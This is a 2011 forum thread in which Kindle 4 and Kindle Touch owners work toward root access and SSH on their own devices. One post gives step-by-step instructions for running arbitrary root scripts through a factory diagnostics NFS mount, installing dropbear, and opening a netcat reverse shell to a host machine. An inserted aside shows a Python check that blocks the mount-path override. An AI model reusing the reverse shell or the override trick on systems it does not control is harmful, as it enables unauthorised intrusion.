12-08-2011, 10:08 AM | #211 |
Junior Member
Posts: 3
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
For all of you who have already opened up your K4 touch... any of you have the 3g option? Anyone tried swapping sims out for an older 3g "unlimited" kindle? I doubt this will work and it's probably software based on the K4 but I'm curious.
|
12-08-2011, 11:26 AM | #212 |
Kindle Dissector
Posts: 662
Karma: 475607
Join Date: Jul 2010
Device: Amazon Kindle 3
|
Nmap shows no open ports. Also, I've said this before, but the 3G restrictions are on the Kindle itself, not based on Amazon's servers. It's very easy to bypass.
|
12-08-2011, 11:45 AM | #213 |
Member
Posts: 12
Karma: 1126
Join Date: Nov 2011
Device: Kindle Touch
|
Before I crack open my Kindle Touch to access the serial port, has anyone tried to run SSH? One way of doing this is to drop SSH into the user-accessible folders over USB, log in to the serial port console, and execute SSH from the console. Does this work?
Secondly, once this is performed, can SSH be integrated into the filesystem permanently, or does that require a new kernel? |
12-08-2011, 03:54 PM | #214 | |
Kindle Dissector
Posts: 662
Karma: 475607
Join Date: Jul 2010
Device: Amazon Kindle 3
|
Quote:
|
|
12-08-2011, 04:28 PM | #215 |
Carpe diem, c'est la vie.
Posts: 6,433
Karma: 10773668
Join Date: Nov 2011
Location: Multiverse 6627A
Device: K1 to PW3
|
Early news: ramirami and dionoea reported having ssh over wifi working on kindle touch now too.
Last edited by geekmaster; 12-08-2011 at 04:57 PM. |
12-08-2011, 04:32 PM | #216 |
Enthusiast
Posts: 26
Karma: 300000
Join Date: Dec 2011
Device: kindle 4
|
Hello,
I've found a method to execute an arbitrary shell script using the diagnostics image. This is kind of useless for the Kindle 4 non-touch since we already have an easier method, but it may enable access to the Kindle Touch. The instructions are a bit complex. They assume that you know how to use USB ethernet and set up an NFS share.

1. Create a USBnet.xml file in your kindle's root directory (over usb). This file will describe an NFS mountpoint. We will use that functionality to override a script which can be executed by the wifi test item in the diagnostics image. The content of the xml file should look like:
Code:
<?xml version="1.0" standalone="no" ?>
<!-- USB Net info -->
<USB_NetInfo
    ipNumber="15"
    device_NFS_path="/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts"
    host_NFS_path="/path/to/nfs/share/on/host/"
/>

3. Reboot your kindle in diagnostics mode.

4. Enable USBnet (see previous post #202 for instructions). If your xml file was properly read you should see something like:
ipAddress : 192.168.15.244
netMask : 255.255.255.0
deviceAddr: EE5900000015
hostAddr : EE2900000015
device_NFS: /opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts
host_NFS : /path/to/nfs/share/on/host/

5. Configure the network interface to use 192.168.15.201 on your computer. This is the IP address which the kindle will connect to in order to mount the NFS share.

6. In the same menu section as USBnet, mount the NFS share.

7. This is where things become interesting. On the NFS share, create an executable script called plat_YOSHI-SDIO.sh. Example content could be:
Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
# make the root filesystem writable
mount -o remount,rw /
echo "howdy"
# drop marker files on the root, local and user-storage partitions
echo "hey" > /hello.msg
echo "here" > /var/local/hello.msg
echo "ho" > /mnt/us/hello.msg

9. Reboot and connect as a usb mass storage device. You should now have a hello.msg file.

This hasn't been tested on a touch yet but I've had confirmation that the script we're trying to override exists so it seems like a pretty safe bet.

Of course my example script is pretty useless. But something like the following script should get you working sshd in the diagnostics image if you can get your hands on a kindle 4 non touch dropbearmulti binary:
Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
mount -o remount,rw /
# install the multi-call binary copied to user storage over USB
cp /mnt/us/dropbearmulti /usr/local/bin/
mkdir /usr/local/sbin
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbear
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbearkey
mkdir /etc/dropbear
# generate the host key through the symlink created above
/usr/local/sbin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key

On the host computer run:
Code:
nc -l -p 1234

Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /tmp
# named pipe that carries the shell's output back into nc
mknod in p
nc 192.168.15.201 1234 0< in | sh > in 2>&1

Once the script is run you should be able to run commands from the host as if on a normal shell (albeit without a prompt). For example running "find /" should output the full file listing.

I'd love to have feedback from touch owners.
Last edited by dionoea; 12-09-2011 at 08:37 AM. Reason: Add reverse shell idea |
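Added example, not part of dionoea's post and not Amazon's code: the override in post #216 works because the diagnostics image mounts the share at whatever device_NFS_path the user-writable USBnet.xml names. This sketch shows the check a firmware author could run before mounting; the dedicated mount root /mnt/nfs and the function name check_usbnet are assumptions.

```python
import posixpath
import xml.etree.ElementTree as ET

# Assumption: the only directory under which a user-supplied share may be mounted.
ALLOWED_MOUNT_ROOT = "/mnt/nfs"

# Constructed sample reproducing the USBnet.xml from post #216.
SAMPLE_OVERRIDE = """<?xml version="1.0" standalone="no" ?>
<!-- USB Net info -->
<USB_NetInfo ipNumber="15"
  device_NFS_path="/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts"
  host_NFS_path="/path/to/nfs/share/on/host/" />"""

# Constructed sample with a mountpoint inside the allowed root.
SAMPLE_OK = SAMPLE_OVERRIDE.replace(
    "/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts",
    "/mnt/nfs/share")


def check_usbnet(xml_text, allowed_root=ALLOWED_MOUNT_ROOT):
    """Return (ok, detail) for the device_NFS_path of a USBnet.xml document."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return False, f"unparseable XML: {exc}"
    if root.tag != "USB_NetInfo":
        return False, f"unexpected root element {root.tag!r}"
    path = root.get("device_NFS_path")
    if not path:
        return False, "device_NFS_path missing"
    if not path.startswith("/"):
        return False, "device_NFS_path must be absolute"
    # Collapse "." and ".." so traversal cannot escape the allowed root.
    # On a real device, also resolve symlinks before comparing.
    norm = posixpath.normpath(path)
    allowed = posixpath.normpath(allowed_root)
    if norm != allowed and not norm.startswith(allowed + "/"):
        return False, f"{norm} is outside {allowed}"
    return True, norm


if __name__ == "__main__":
    for name, doc in (("override", SAMPLE_OVERRIDE), ("ok", SAMPLE_OK)):
        print(name, check_usbnet(doc))
```
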
12-09-2011, 04:29 AM | #217 |
Junior Member
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
I happened to find that the 4.0.1 update modified the root password of the diag image.
@dionoea, your method is exactly what I thought about. I also tried to mount an NFS share of init.d; it works on K4 non-touch 4.0.1 |
12-09-2011, 04:57 AM | #218 | ||
Enthusiast
Posts: 26
Karma: 300000
Join Date: Dec 2011
Device: kindle 4
|
Quote:
Quote:
|
||
12-09-2011, 05:01 AM | #219 | |
Junior Member
Posts: 8
Karma: 10
Join Date: Nov 2011
Device: Kindle4
|
howto howto howto !!
Hey seaniko7 / dionoea !
Quote:
Cheers, Karl Last edited by karl_k; 12-09-2011 at 05:03 AM. |
|
12-09-2011, 05:21 AM | #220 | |
Junior Member
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
Quote:
And I made a mistake: the NFS share of init.d doesn't work. It was because my sshd survived that update XD |
|
12-09-2011, 05:40 AM | #221 |
wannabe developer
Posts: 192
Karma: 156548
Join Date: Mar 2011
Device: Kindle: 2xKeyboard, Classic, 2xTouch, 2xPW, PW2; Onyx: Boox M92
|
Yup, I'll make a tut, which will also include the steps needed for unbricking (I messed up init.d while forcing it to load usbSerial on start, which obviously caused a brick, and it was tricky to fix because the recovery kernel won't allow you to export mmcblk0p1).
|
12-09-2011, 06:03 AM | #222 |
Junior Member
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
Hi folks,
I'm trying to get SSH on my Kindle 4 non-touch, but it fails at the usbNet step. When I boot into Diag mode I don't see an "Enable usbNet" item. The text on screen, from the top:
Code:
TEQUILA - System Diags
---- 1.0.6.194 --- -1097929848 ---
S) Device Settings
O) Operator test suite
R) Run in Test
G) Gas Gause
E) 511
T) Power Test
H) Adjust battery
M) MoviNand
N) Misc individual diagnostics
Y) ART 11g factory test
U) USB device mode
D) Exit, Reboot or Disable Diags
------------------
X) Exit - FW RIGHT to exit |
12-09-2011, 06:14 AM | #223 |
Junior Member
Posts: 9
Karma: 10
Join Date: Dec 2011
Location: Uzbekistan
Device: Kindle 4
|
|
12-09-2011, 06:30 AM | #224 | |
Enthusiast
Posts: 26
Karma: 300000
Join Date: Dec 2011
Device: kindle 4
|
Quote:
|
|
12-09-2011, 07:03 AM | #225 |
Junior Member
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
Got it.
Does anyone know how to disable ads? |
|